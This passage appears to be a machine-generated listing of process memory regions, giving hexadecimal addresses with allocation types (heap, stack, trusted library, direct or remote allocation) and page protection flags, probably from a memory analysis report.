page read and write
883C000
stack
page read and write
79F0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
5C30000
direct allocation
page read and write
B680000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
A718000
trusted library allocation
page read and write
7D90000
unkown
page read and write
A710000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9F9AFFF000
stack
page read and write
7DA0000
trusted library allocation
page read and write
2BC50C10000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
17884B13000
heap
page read and write
A660000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
9AA0000
unkown
page read and write
A6D0000
trusted library allocation
page read and write
2286A45E000
heap
page read and write
7DA0000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8C4000
heap
page read and write
9880000
trusted library allocation
page read and write
3769000
heap
page read and write
9B80000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
A68D000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
5E98000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
96B0000
unkown
page read and write
3ADFC7E000
stack
page read and write
7DA7000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
BDBD000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
10CE000
stack
page read and write
9830000
trusted library allocation
page execute and read and write
2BC50EED000
heap
page read and write
A6D0000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
3420000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
44D87F000
stack
page read and write
776D000
trusted library allocation
page read and write
8935000
unkown
page read and write
9BD0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
2286A446000
heap
page read and write
9B40000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
8970000
unkown
page read and write
9890000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
96D6000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
B4B2000
trusted library allocation
page read and write
B804000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
96B8000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
2BC4B330000
heap
page read and write
3ADF50B000
stack
page read and write
7D94000
unkown
page read and write
128F000
heap
page read and write
8910000
trusted library allocation
page read and write
BE35000
trusted library allocation
page read and write
12B0000
direct allocation
page read and write
96B0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
C88000
heap
page read and write
A8ED000
stack
page read and write
98C0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
7870000
trusted library allocation
page read and write
8898000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
2BC4BF58000
heap
page read and write
9B30000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
8986000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
3523000
heap
page read and write
1E0A9C55000
heap
page read and write
9870000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
3400000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9AB0000
trusted library allocation
page read and write
88B0000
trusted library section
page read and write
A660000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
1291000
heap
page read and write
7860000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
2BC4BF00000
heap
page read and write
A6D0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
884000
heap
page read and write
3440000
heap
page read and write
898C000
trusted library allocation
page read and write
2BC4B513000
heap
page read and write
9740000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
B46E000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
19EED9D0000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
2BC50EF3000
heap
page read and write
7850000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
3400000
trusted library allocation
page read and write
1D5AE08A000
heap
page read and write
19EEDA58000
heap
page read and write
741357F000
stack
page read and write
A6A0000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
12EA000
heap
page read and write
7750000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
2BC50CA0000
remote allocation
page read and write
8940000
trusted library allocation
page read and write
8940000
unkown
page read and write
9880000
trusted library allocation
page read and write
BD78000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
24BED690000
remote allocation
page read and write
1B9B8A8A000
heap
page read and write
1E0A9AA0000
heap
page read and write
1E0A9D13000
heap
page read and write
98A0000
trusted library allocation
page read and write
5377000
heap
page read and write
9B40000
trusted library allocation
page read and write
24BECD50000
heap
page read and write
3328000
heap
page read and write
9BF3000
trusted library allocation
page read and write
2286A461000
heap
page read and write
F5CCFFF000
stack
page read and write
96E0000
trusted library allocation
page read and write
9870000
unkown
page read and write
1136000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
7DA6000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
88F0000
trusted library allocation
page execute and read and write
8930000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
5F82BFD000
stack
page read and write
1B9B88D0000
heap
page read and write
97B0000
trusted library allocation
page read and write
C8E000
stack
page read and write
17884A68000
heap
page read and write
8950000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
2BC4B502000
heap
page read and write
A700000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
1096000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
1E0A9C2C000
heap
page read and write
9840000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9B20000
unkown
page read and write
9890000
trusted library allocation
page read and write
993000
heap
page read and write
88D0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
2BC50CA0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
2286A47B000
heap
page read and write
9C10000
trusted library allocation
page read and write
96B5000
unkown
page read and write
9980000
trusted library allocation
page read and write
2BC4B473000
heap
page read and write
2F0000
heap
page read and write
9A80000
trusted library allocation
page read and write
92A000
heap
page read and write
1034000
heap
page read and write
2BC4B488000
heap
page read and write
1093000
trusted library allocation
page read and write
2286A45A000
heap
page read and write
78A0000
trusted library allocation
page read and write
55A0000
heap
page execute and read and write
A7C0000
trusted library allocation
page read and write
BD5E000
trusted library allocation
page read and write
3527000
heap
page read and write
8910000
trusted library allocation
page read and write
5648000
heap
page read and write
24BECE13000
heap
page read and write
98C5000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8832000
trusted library allocation
page read and write
B6B0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
2BC4B526000
heap
page read and write
9B50000
trusted library allocation
page read and write
5640000
heap
page read and write
96B0000
trusted library allocation
page read and write
5C90000
direct allocation
page read and write
98A0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7D90000
unkown
page read and write
A6F0000
trusted library allocation
page read and write
B495000
trusted library allocation
page read and write
BA70000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
886C000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
BC9B000
trusted library allocation
page read and write
9F9AB7E000
stack
page read and write
98C0000
trusted library allocation
page read and write
65C1000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
98C8000
trusted library allocation
page read and write
2BC4B4AC000
heap
page read and write
9900000
trusted library allocation
page read and write
5540000
heap
page read and write
7DA0000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
8823000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
34B9000
heap
page read and write
2BC50C50000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
EE0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
8987000
unkown
page read and write
98A0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5B23000
trusted library allocation
page read and write
87E0000
trusted library allocation
page read and write
5B04000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
8930000
unkown
page read and write
9BD0000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
88B0000
direct allocation
page read and write
1B9B9202000
trusted library allocation
page read and write
8940000
unkown
page read and write
9B40000
trusted library allocation
page read and write
1E0A9C89000
heap
page read and write
9B60000
trusted library allocation
page read and write
5B98000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
B4CD000
trusted library allocation
page read and write
536E000
stack
page read and write
34BD000
heap
page read and write
8930000
trusted library allocation
page read and write
5B6D000
trusted library allocation
page read and write
20A30A5C000
heap
page read and write
89A000
heap
page read and write
63C2F7F000
stack
page read and write
7690000
trusted library allocation
page read and write
7D95000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
2BC50B40000
trusted library allocation
page read and write
2BC50C90000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
5080000
trusted library allocation
page read and write
17885402000
trusted library allocation
page read and write
1D5AE05B000
heap
page read and write
98A0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
A6C3000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
1B9B8A3C000
heap
page read and write
9B10000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
1E0AA402000
trusted library allocation
page read and write
1027000
heap
page read and write
A6E0000
trusted library allocation
page read and write
5B5F000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
2BC4C5F0000
trusted library section
page readonly
7DA0000
trusted library allocation
page read and write
7DA6000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
24BECE29000
heap
page read and write
7D90000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
17884A28000
heap
page read and write
9820000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
741307B000
stack
page read and write
F5CD0FF000
stack
page read and write
B740000
trusted library allocation
page execute and read and write
9820000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
1230000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
828000
heap
page read and write
9BA0000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
5B57000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
24BED690000
remote allocation
page read and write
19EEDA13000
heap
page read and write
98C7000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
88BE000
stack
page read and write
5E90000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
EC4BE7E000
stack
page read and write
A660000
trusted library allocation
page read and write
52ED000
trusted library allocation
page execute and read and write
7D90000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9870000
trusted library allocation
page execute and read and write
A6E0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
741367C000
stack
page read and write
34C0000
heap
page read and write
98C0000
trusted library allocation
page read and write
7600000
direct allocation
page read and write
9880000
trusted library allocation
page read and write
B83A000
trusted library allocation
page read and write
87B9000
trusted library allocation
page read and write
9903000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
974000
heap
page read and write
A710000
trusted library allocation
page read and write
A9AE000
stack
page read and write
8940000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9997000
trusted library allocation
page read and write
20A30A5E000
heap
page read and write
9BE0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
2286A431000
heap
page read and write
1B9B8A29000
heap
page read and write
9BF7000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
98DF000
trusted library allocation
page read and write
C7F000
stack
page read and write
9AA0000
trusted library allocation
page read and write
61F8D7C000
stack
page read and write
9A80000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
BE93000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
4ED0000
heap
page read and write
9750000
trusted library allocation
page read and write
A6D4000
trusted library allocation
page read and write
4B1D000
stack
page read and write
99A000
heap
page read and write
98C0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
7DB0000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
BBEA000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
98E0000
trusted library allocation
page execute and read and write
9890000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
975000
heap
page read and write
1E0A9C54000
heap
page read and write
2BC50ED5000
heap
page read and write
9880000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
2BC4B3A0000
heap
page read and write
9820000
trusted library allocation
page read and write
75E0000
direct allocation
page read and write
9880000
trusted library allocation
page read and write
113A000
trusted library allocation
page read and write
A740000
trusted library allocation
page read and write
EC4BBFC000
stack
page read and write
9BF0000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
2BC4BE15000
heap
page read and write
5F81000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
12CA000
heap
page read and write
A6D0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
4E7E000
stack
page read and write
98C0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
2BC50A30000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
9BDA000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
8D8000
heap
page read and write
7750000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
44D9FD000
stack
page read and write
BB73000
trusted library allocation
page read and write
330000
heap
page read and write
8CD000
heap
page read and write
98C0000
trusted library allocation
page read and write
340000
trusted library allocation
page read and write
F5CCBF9000
stack
page read and write
9B80000
trusted library allocation
page read and write
1E0A9C13000
heap
page read and write
5BB7000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
830000
heap
page read and write
98A0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
24BECE5C000
heap
page read and write
506F000
stack
page read and write
98D0000
trusted library allocation
page read and write
7D90000
unkown
page read and write
BB24000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9B9C000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
139BBE13000
heap
page read and write
9890000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
8970000
unkown
page read and write
7D95000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
BB7C000
trusted library allocation
page read and write
128E000
heap
page read and write
12BF000
heap
page read and write
6621000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
BAC2000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
491000
stack
page read and write
98A0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
3430000
unkown
page read and write
F5CC5EB000
stack
page read and write
9B40000
trusted library allocation
page read and write
9B20000
unkown
page read and write
8940000
trusted library allocation
page read and write
990D000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
10A2000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
A3231FF000
stack
page read and write
97B0000
trusted library allocation
page read and write
19EEDA24000
heap
page read and write
9880000
trusted library allocation
page read and write
3328000
heap
page read and write
A92E000
stack
page read and write
BADC000
trusted library allocation
page read and write
B710000
trusted library allocation
page read and write
7DA5000
trusted library allocation
page read and write
559D000
stack
page read and write
5C81000
direct allocation
page read and write
98C0000
trusted library allocation
page read and write
5F66000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
972000
heap
page read and write
8975000
trusted library allocation
page read and write
A740000
trusted library allocation
page read and write
A6A4000
trusted library allocation
page read and write
BAB1000
trusted library allocation
page read and write
8858000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
2286A427000
heap
page read and write
97B0000
trusted library allocation
page read and write
7D92000
trusted library allocation
page read and write
61F897F000
stack
page read and write
9890000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
7D70000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
1060000
remote allocation
page read and write
A710000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
3ADFA7B000
stack
page read and write
61F87FE000
stack
page read and write
97B0000
trusted library allocation
page read and write
1260000
heap
page read and write
98C5000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
63C2DFE000
stack
page read and write
7DA0000
trusted library allocation
page read and write
5BA1000
trusted library allocation
page read and write
F5CD07E000
stack
page read and write
88E8000
direct allocation
page read and write
96B0000
unkown
page read and write
3410000
trusted library allocation
page execute and read and write
97B0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
7B11000
heap
page read and write
5E32000
trusted library allocation
page read and write
5890000
trusted library allocation
page read and write
7876000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
7CEC000
trusted library allocation
page read and write
87D6000
trusted library allocation
page read and write
2BC4B3E0000
trusted library section
page read and write
98A0000
trusted library allocation
page read and write
1020000
heap
page read and write
7DA0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
3523000
heap
page read and write
1390000
heap
page read and write
8970000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
5B76000
trusted library allocation
page read and write
50A0000
trusted library allocation
page read and write
52D3000
trusted library allocation
page execute and read and write
9B90000
trusted library allocation
page read and write
77ED000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
B9DA000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
A6A9000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
96E5000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
540E000
stack
page read and write
9825000
trusted library allocation
page read and write
B650000
trusted library allocation
page read and write
5C72000
direct allocation
page read and write
98D0000
trusted library allocation
page read and write
B464000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
A322EFB000
stack
page read and write
9B90000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7D60000
trusted library allocation
page read and write
98A8000
trusted library allocation
page read and write
124E000
stack
page read and write
9760000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
1E0A9C58000
heap
page read and write
A750000
trusted library allocation
page read and write
9A07000
unkown
page read and write
98A0000
trusted library allocation
page read and write
8980000
unkown
page read and write
9940000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
7D80000
trusted library allocation
page read and write
374E000
stack
page read and write
8910000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
7D30000
trusted library allocation
page execute and read and write
9BD0000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
F5CD2FC000
stack
page read and write
34B9000
heap
page read and write
9880000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
119E000
stack
page read and write
7C4F000
stack
page read and write
99A0000
trusted library allocation
page read and write
20A30A63000
heap
page read and write
9BC5000
trusted library allocation
page read and write
B4C8000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
2BC4B475000
heap
page read and write
9B30000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
8C3000
heap
page read and write
54C0000
trusted library allocation
page read and write
EC4C1FE000
stack
page read and write
5AB1000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
888000
heap
page read and write
A6E0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
2286A413000
heap
page read and write
8940000
trusted library allocation
page read and write
B660000
trusted library allocation
page read and write
2BC4B4A2000
heap
page read and write
8975000
unkown
page read and write
54FE000
stack
page read and write
9A80000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
2286A46B000
heap
page read and write
3420000
trusted library allocation
page read and write
55C1000
trusted library allocation
page read and write
9AE0000
unkown
page read and write
9B50000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
3760000
heap
page read and write
9BE0000
trusted library allocation
page read and write
12DD000
heap
page read and write
9C10000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
5C0A000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
1083000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
941000
heap
page read and write
2BC50F02000
heap
page read and write
BB15000
trusted library allocation
page read and write
9983000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
2BC4B49A000
heap
page read and write
7DA0000
trusted library allocation
page read and write
962E000
stack
page read and write
A7E0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
20A311A0000
trusted library allocation
page read and write
1B9B8A4D000
heap
page read and write
A690000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
B46B000
trusted library allocation
page read and write
2BC50E9D000
heap
page read and write
2286A45B000
heap
page read and write
7D95000
trusted library allocation
page read and write
BB4E000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
94C000
heap
page read and write
19EEDB02000
heap
page read and write
61F83BB000
stack
page read and write
9870000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
992F000
trusted library allocation
page read and write
20A30900000
heap
page read and write
96B0000
trusted library allocation
page read and write
2BC4C993000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
A670000
trusted library allocation
page execute and read and write
A3230FC000
stack
page read and write
98B0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
1B9B8A56000
heap
page read and write
77A0000
trusted library allocation
page read and write
3521000
heap
page read and write
1060000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
57EE000
stack
page read and write
1B9B8A52000
heap
page read and write
8945000
unkown
page read and write
88E0000
trusted library allocation
page read and write
2BC4B48A000
heap
page read and write
7D96000
unkown
page read and write
7DA0000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
5B1B000
trusted library allocation
page read and write
1B9B8B02000
heap
page read and write
5302000
trusted library allocation
page read and write
A6C8000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
9870000
unkown
page read and write
99B0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
7DA8000
unkown
page read and write
7DA0000
trusted library allocation
page read and write
BA5F000
trusted library allocation
page read and write
7DA6000
trusted library allocation
page read and write
7D90000
unkown
page read and write
9BD0000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
857000
heap
page read and write
A3232FD000
stack
page read and write
A700000
trusted library allocation
page read and write
995000
heap
page read and write
98C0000
trusted library allocation
page read and write
2286A360000
heap
page read and write
9880000
trusted library allocation
page read and write
1E0A9D08000
heap
page read and write
9B40000
unkown
page read and write
97B0000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
8856000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A3236FF000
stack
page read and write
A710000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
2BC4BF13000
heap
page read and write
9B50000
trusted library allocation
page read and write
2BC50B61000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
2BC4B429000
heap
page read and write
9B80000
trusted library allocation
page read and write
1093000
trusted library allocation
page read and write
2BC50B70000
trusted library allocation
page read and write
BC92000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
8EB000
heap
page read and write
98C0000
trusted library allocation
page read and write
7DA5000
unkown
page read and write
8930000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
17884A00000
heap
page read and write
352D000
heap
page read and write
139BBE29000
heap
page read and write
19EEDB00000
heap
page read and write
8930000
trusted library allocation
page read and write
F50000
heap
page read and write
8852000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9F9AA7B000
stack
page read and write
7DB0000
trusted library allocation
page execute and read and write
19EEDA58000
heap
page read and write
98C0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
98B4000
trusted library allocation
page read and write
1D5AE102000
heap
page read and write
9BD0000
trusted library allocation
page read and write
1B9B8A4A000
heap
page read and write
79F0000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
8980000
unkown
page read and write
9880000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
110E000
stack
